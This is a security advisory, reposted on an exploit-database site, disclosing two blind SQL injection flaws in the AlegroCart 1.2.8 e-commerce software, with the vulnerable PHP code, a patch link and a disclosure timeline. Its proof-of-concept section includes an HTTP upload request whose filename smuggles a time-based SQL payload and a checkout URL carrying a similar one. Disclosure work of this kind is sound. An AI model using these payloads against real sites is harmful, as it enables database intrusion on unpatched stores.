0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AlegroCart 1.2.8 - Multiple SQL Injection Vulnerabilities
[1. Introduction
Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_17102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website: http://alegrocart.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an
attacker.
3. BLind SQL Injection (Admin)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When viewing the list of uploaded files - or images - , the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.
Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.
Admin credentials are required to exploit this issue.
Proof of Concept
POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794
Content-Length: 865
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"
test
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg
img
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="mask"
11953405959037.jpg
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="remaining"
1
-----------------------------16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"
f396df6c76265de943be163e9b65878a
-----------------------------16690383031191084421650661794--
Visiting
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download
will trigger the injected code.
Code
/upload/admin2/model/products/model_admin_download.php
function check_download($filename){
$result = $this->database->getRow("select * from download where filename = '".$filename."'");
return $result;
}
function check_filename($filename){
$results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
return $results;
}
/upload/admin2/controller/download.php
function checkFiles() {
$files=glob(DIR_DOWNLOAD.'*.*');
if (!$files) { return; }
foreach ($files as $file) {
$pattern='/\.('.implode('|',$this->prohibited_types).')$/';
$filename=basename($file);
if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
$result = $this->modelDownload->check_download($filename);
if (!$result) { $this->init($filename); }
}
}
}
4. BLind SQL Injection (Customer)
CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when using Paypal as a payment method during
checkout.
Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.
Proof of Concept
1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation"
3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token.
The injection can be exploited blind:
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23)
However, this is rather unpractical, especially considering the need for a
valid PayPal token for each request.
It is also possible with this injection to inject into an UPDATE statement in
update_order_status_paidunconfirmed. The problem here is that it is difficult
to create an injection that exploits the UPDATE statement, but also results in
an order_id being returned by the previous SELECT statement.
It may also be possible to use the order_id that can be controlled via the
SELECT statement to inject into the INSERT statement in update_order_history.
But again, it is difficult to craft a query that does this, but also returns a
valid result for the UPDATE query.
Code
/upload/catalog/extension/payment/paypal.php:
function orderUpdate($status = 'final_order_status', $override = 0) {
//Find the paid_unconfirmed status id
$results = $this->getOrderStatusId('order_status_paid_unconfirmed');
$paidUnconfirmedStatusId = $results?$results:0;
//Find the final order status id
$results = $this->getOrderStatusId($status);
$finalStatusId = $results?$results:0;
$reference = $this->request->get('ref');
//Get Order Id
$res = $this->modelPayment->get_order_id($reference);
$order_id = $res['order_id'];
//Update order only if state in paid unconfirmed OR override is set
if ($order_id) {
if ($override) {
// Update order status
$result = $this->modelPayment->update_order_status_override($finalStatusId,$reference);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'override');
}
} else {
// Update order status only if status is currently paid_unconfirmed
$result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId);
// Update order_history
if ($result) {
$this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN');
}
}
}
}
/upload/catalog/model/payment/model_payment.php:
function get_order_id($reference){
$result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'");
return $result;
}
function update_order_history($order_id, $finalStatusId,$comment){
$this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'");
}
function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){
$result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'"));
return $result;
}
5. Solution
To mitigate this issue please apply this patch:
http://forum.alegrocart.com/download/file.php?id=1040
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue
17/10/2015 Vendor releases fix
11/13/2015 Disclosed to public
# 0day.today [2024-09-29] #